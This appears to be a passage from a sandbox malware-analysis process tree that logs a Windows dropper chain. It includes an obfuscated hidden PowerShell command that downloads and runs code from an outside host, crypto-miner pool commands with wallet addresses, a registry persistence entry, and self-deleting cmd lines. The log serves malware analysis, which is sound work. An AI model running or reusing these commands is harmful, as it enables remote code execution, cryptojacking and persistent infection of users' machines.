C:\Users\Admin\AppData\Local\Temp\is-0OU2I.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-0OU2I.tmp\setups.tmp" /SL5="$20604,635399,250368,C:\Users\Admin\AppData\Local\Temp\7PM5BVCZ40\setups.exe" ll11⤵PID:19240
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"9⤵PID:15284
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵PID:6936
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
PID:7340
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"9⤵PID:14232
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"10⤵PID:7796
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install11⤵PID:7316
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"9⤵PID:1264
-
C:\Users\Admin\AppData\Roaming\6416.tmp.exe"C:\Users\Admin\AppData\Roaming\6416.tmp.exe"10⤵PID:8164
-
C:\Users\Admin\AppData\Roaming\6416.tmp.exe"C:\Users\Admin\AppData\Roaming\6416.tmp.exe"11⤵PID:7344
-
-
-
C:\Users\Admin\AppData\Roaming\6B1C.tmp.exe"C:\Users\Admin\AppData\Roaming\6B1C.tmp.exe"10⤵PID:9012
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999911⤵PID:8136
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999911⤵PID:10160
-
-
-
C:\Users\Admin\AppData\Roaming\6D21.tmp.exe"C:\Users\Admin\AppData\Roaming\6D21.tmp.exe"10⤵PID:9440
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\6D21.tmp.exe11⤵PID:8468
-
C:\Windows\SysWOW64\timeout.exetimeout /t 312⤵
- Delays execution with timeout.exe
PID:19224
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"10⤵PID:11480
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.111⤵
- Runs ping.exe
PID:12988
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"9⤵PID:11836
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nqncopqc.tss\Four.exe & exit7⤵PID:15012
-
C:\Users\Admin\AppData\Local\Temp\nqncopqc.tss\Four.exeC:\Users\Admin\AppData\Local\Temp\nqncopqc.tss\Four.exe8⤵PID:15336
-
C:\Users\Admin\AppData\Local\Temp\024SPE1H9X\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\024SPE1H9X\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1049⤵PID:7548
-
C:\Users\Admin\AppData\Local\Temp\024SPE1H9X\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\024SPE1H9X\multitimer.exe" 1 3.1617436397.60681eed8cd9b 10410⤵PID:8948
-
C:\Users\Admin\AppData\Local\Temp\024SPE1H9X\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\024SPE1H9X\multitimer.exe" 2 3.1617436397.60681eed8cd9b11⤵PID:10120
-
C:\Users\Admin\AppData\Local\Temp\s3bdog2gdvo\vict.exe"C:\Users\Admin\AppData\Local\Temp\s3bdog2gdvo\vict.exe" /VERYSILENT /id=53512⤵PID:15552
-
C:\Users\Admin\AppData\Local\Temp\is-03084.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-03084.tmp\vict.tmp" /SL5="$3057E,870426,780800,C:\Users\Admin\AppData\Local\Temp\s3bdog2gdvo\vict.exe" /VERYSILENT /id=53513⤵PID:16644
-
C:\Users\Admin\AppData\Local\Temp\is-2M149.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-2M149.tmp\win1host.exe" 53514⤵PID:1920
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fnupaf43ljc\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\fnupaf43ljc\Setup3310.exe" /Verysilent /subid=57712⤵PID:13756
-
C:\Users\Admin\AppData\Local\Temp\is-B1PJN.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-B1PJN.tmp\Setup3310.tmp" /SL5="$306B8,138429,56832,C:\Users\Admin\AppData\Local\Temp\fnupaf43ljc\Setup3310.exe" /Verysilent /subid=57713⤵PID:12376
-
C:\Users\Admin\AppData\Local\Temp\is-DOBLJ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-DOBLJ.tmp\Setup.exe" /Verysilent14⤵PID:6468
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\aendrtaykjr\ebrr354e1u2.exe"C:\Users\Admin\AppData\Local\Temp\aendrtaykjr\ebrr354e1u2.exe" /ustwo INSTALL12⤵PID:15580
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "ebrr354e1u2.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\aendrtaykjr\ebrr354e1u2.exe" & exit13⤵PID:2280
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "ebrr354e1u2.exe" /f14⤵
- Kills process with taskkill
PID:19256
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jnp4atq2q2k\app.exe"C:\Users\Admin\AppData\Local\Temp\jnp4atq2q2k\app.exe" /8-2312⤵PID:15540
-
-
C:\Users\Admin\AppData\Local\Temp\bwj4cpiek4u\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\bwj4cpiek4u\cpyrix.exe" /VERYSILENT12⤵PID:14012
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe13⤵PID:12200
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"14⤵PID:7064
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub14⤵PID:6036
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe15⤵PID:12920
-
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe13⤵PID:15896
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"14⤵PID:9784
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\D041RU04S7\setups.exe"C:\Users\Admin\AppData\Local\Temp\D041RU04S7\setups.exe" ll9⤵PID:7324
-
-
-
-
-
C:\Program Files\Windows Photo Viewer\DFETAMCNGG\prolab.exe"C:\Program Files\Windows Photo Viewer\DFETAMCNGG\prolab.exe" /VERYSILENT6⤵PID:4968
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"3⤵PID:1232
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"4⤵PID:5660
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install5⤵PID:4412
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"3⤵PID:3720
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"4⤵PID:5272
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install5⤵PID:5044
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe"3⤵PID:2208
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe4⤵PID:784
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"3⤵PID:1496
-
C:\Users\Admin\AppData\Local\Temp\899M3XJ2QB\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\899M3XJ2QB\multitimer.exe" 0 306065bb10421b26.04333812 0 1034⤵PID:4112
-
C:\Users\Admin\AppData\Local\Temp\899M3XJ2QB\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\899M3XJ2QB\multitimer.exe" 1 3.1617436170.60681e0a49f4f 1035⤵PID:1124
-
C:\Users\Admin\AppData\Local\Temp\899M3XJ2QB\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\899M3XJ2QB\multitimer.exe" 2 3.1617436170.60681e0a49f4f6⤵PID:4196
-
C:\Users\Admin\AppData\Local\Temp\5jff01byp53\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\5jff01byp53\cpyrix.exe" /VERYSILENT7⤵PID:16420
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe8⤵PID:17120
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"9⤵PID:19096
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub9⤵PID:19412
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe10⤵PID:18936
-
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe8⤵PID:17816
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"9⤵PID:8348
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuva1uggkxl\oa5xjggi5cb.exe"C:\Users\Admin\AppData\Local\Temp\tuva1uggkxl\oa5xjggi5cb.exe" /ustwo INSTALL7⤵PID:16628
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "oa5xjggi5cb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\tuva1uggkxl\oa5xjggi5cb.exe" & exit8⤵PID:19172
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "oa5xjggi5cb.exe" /f9⤵
- Kills process with taskkill
PID:5104
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nlhjywks50h\app.exe"C:\Users\Admin\AppData\Local\Temp\nlhjywks50h\app.exe" /8-237⤵PID:16748
-
C:\Users\Admin\AppData\Local\Temp\nlhjywks50h\app.exe"C:\Users\Admin\AppData\Local\Temp\nlhjywks50h\app.exe" /8-238⤵PID:7280
-
-
-
C:\Users\Admin\AppData\Local\Temp\fpoyt4lggfj\vpn.exe"C:\Users\Admin\AppData\Local\Temp\fpoyt4lggfj\vpn.exe" /silent /subid=4827⤵PID:16824
-
C:\Users\Admin\AppData\Local\Temp\is-ER530.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-ER530.tmp\vpn.tmp" /SL5="$F006A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\fpoyt4lggfj\vpn.exe" /silent /subid=4828⤵PID:17116
-
-
-
C:\Users\Admin\AppData\Local\Temp\zfypkx4x2nm\vict.exe"C:\Users\Admin\AppData\Local\Temp\zfypkx4x2nm\vict.exe" /VERYSILENT /id=5357⤵PID:16848
-
C:\Users\Admin\AppData\Local\Temp\is-KSV14.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-KSV14.tmp\vict.tmp" /SL5="$30326,870426,780800,C:\Users\Admin\AppData\Local\Temp\zfypkx4x2nm\vict.exe" /VERYSILENT /id=5358⤵PID:17124
-
C:\Users\Admin\AppData\Local\Temp\is-OQVSP.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-OQVSP.tmp\win1host.exe" 5359⤵PID:18208
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\waaufmhfuz0\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\waaufmhfuz0\Setup3310.exe" /Verysilent /subid=5777⤵PID:16896
-
C:\Users\Admin\AppData\Local\Temp\is-U87LC.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-U87LC.tmp\Setup3310.tmp" /SL5="$3032A,138429,56832,C:\Users\Admin\AppData\Local\Temp\waaufmhfuz0\Setup3310.exe" /Verysilent /subid=5778⤵PID:17132
-
C:\Users\Admin\AppData\Local\Temp\is-GS02E.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GS02E.tmp\Setup.exe" /Verysilent9⤵PID:19260
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\M0FEGEEFPI\setups.exe"C:\Users\Admin\AppData\Local\Temp\M0FEGEEFPI\setups.exe" ll4⤵PID:3324
-
C:\Users\Admin\AppData\Local\Temp\is-S85DC.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-S85DC.tmp\setups.tmp" /SL5="$7031A,635399,250368,C:\Users\Admin\AppData\Local\Temp\M0FEGEEFPI\setups.exe" ll5⤵PID:4404
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"3⤵PID:2268
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"3⤵PID:6024
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"3⤵PID:6012
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 9524⤵
- Program crash
PID:16356
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 10084⤵
- Program crash
PID:16652
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 10804⤵
- Program crash
PID:16996
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 10604⤵
- Program crash
PID:17320
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 11444⤵
- Program crash
PID:17540
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 12004⤵
- Program crash
PID:17788
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 15044⤵
- Program crash
PID:19280
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 15404⤵
- Program crash
PID:6588
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 15684⤵
- Program crash
PID:8240
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 16684⤵
- Program crash
PID:9452
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 17204⤵
- Program crash
PID:9768
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 17164⤵
- Program crash
PID:10296
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 17484⤵
- Program crash
PID:10516
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-0R0BV.tmp\0f2esbhuftk.tmp"C:\Users\Admin\AppData\Local\Temp\is-0R0BV.tmp\0f2esbhuftk.tmp" /SL5="$3031E,2592217,780800,C:\Users\Admin\AppData\Local\Temp\1sxnnmhkqe2\0f2esbhuftk.exe" /VERYSILENT1⤵PID:5580
-
C:\Users\Admin\AppData\Local\Temp\is-78LJG.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-78LJG.tmp\winlthsth.exe"2⤵PID:5356
-
C:\Users\Admin\AppData\Local\Temp\OBesqMZvI.exe"C:\Users\Admin\AppData\Local\Temp\OBesqMZvI.exe"3⤵PID:3104
-
C:\Users\Admin\AppData\Local\Temp\OBesqMZvI.exe"C:\Users\Admin\AppData\Local\Temp\OBesqMZvI.exe"4⤵PID:5484
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"3⤵PID:18952
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"4⤵PID:19440
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-4DGGV.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-4DGGV.tmp\IBInstaller_97039.tmp" /SL5="$1048C,14574851,721408,C:\Users\Admin\AppData\Local\Temp\0usxlffz04x\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq1⤵PID:5844
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-DRD0L.tmp\{app}\microsoft.cab -F:* %ProgramData%2⤵PID:6116
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-DRD0L.tmp\{app}\microsoft.cab -F:* C:\ProgramData3⤵PID:2148
-
-
-
C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"2⤵PID:19452
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^¶m=2⤵PID:12432
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f2⤵PID:12408
-
-
C:\Users\Admin\AppData\Local\Temp\is-DRD0L.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-DRD0L.tmp\{app}\chrome_proxy.exe"2⤵PID:15300
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-DRD0L.tmp\{app}\chrome_proxy.exe"3⤵PID:17744
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 44⤵
- Runs ping.exe
PID:5156
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5884
-
C:\Users\Admin\AppData\Local\Temp\is-94TVM.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-94TVM.tmp\vict.tmp" /SL5="$60312,870426,780800,C:\Users\Admin\AppData\Local\Temp\ninsxiq1eb2\vict.exe" /VERYSILENT /id=5351⤵PID:5552
-
C:\Users\Admin\AppData\Local\Temp\is-138HP.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-138HP.tmp\win1host.exe" 5352⤵PID:6028
-
C:\Users\Admin\AppData\Local\Temp\el3CmzqCU.exe"C:\Users\Admin\AppData\Local\Temp\el3CmzqCU.exe"3⤵PID:4584
-
C:\Users\Admin\AppData\Local\Temp\el3CmzqCU.exe"C:\Users\Admin\AppData\Local\Temp\el3CmzqCU.exe"4⤵PID:4060
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6028 -s 6483⤵
- Program crash
PID:14936
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:4168
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DC1168402032C459DAEB9EDDACB6C8A8 C2⤵PID:4660
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3379B71DD56E5F16E97C403A0D21C27A2⤵PID:5884
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵PID:14440
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default3⤵PID:14876
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"4⤵PID:8736
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exeC:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1bc,0x1ec,0x7ffe36579ec0,0x7ffe36579ed0,0x7ffe36579ee05⤵PID:8312
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exeC:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff7fd6c4e60,0x7ff7fd6c4e70,0x7ff7fd6c4e806⤵PID:13708
-
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1560,8462288319323910076,10555294116063228645,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8736_1478805399" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1572 /prefetch:25⤵PID:6092
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1560,8462288319323910076,10555294116063228645,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8736_1478805399" --mojo-platform-channel-handle=1708 /prefetch:85⤵PID:11100
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1560,8462288319323910076,10555294116063228645,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8736_1478805399" --mojo-platform-channel-handle=2092 /prefetch:85⤵PID:12356
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1560,8462288319323910076,10555294116063228645,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8736_1478805399" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2568 /prefetch:15⤵PID:5760
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1560,8462288319323910076,10555294116063228645,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8736_1478805399" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1872 /prefetch:25⤵PID:8148
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1560,8462288319323910076,10555294116063228645,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8736_1478805399" --mojo-platform-channel-handle=2776 /prefetch:85⤵PID:13956
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1560,8462288319323910076,10555294116063228645,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8736_1478805399" --mojo-platform-channel-handle=1784 /prefetch:85⤵PID:15964
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE73F6.bat" "3⤵PID:9724
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"4⤵
- Views/modifies file attributes
PID:10876
-
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
PID:11432
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE73F6.bat"4⤵
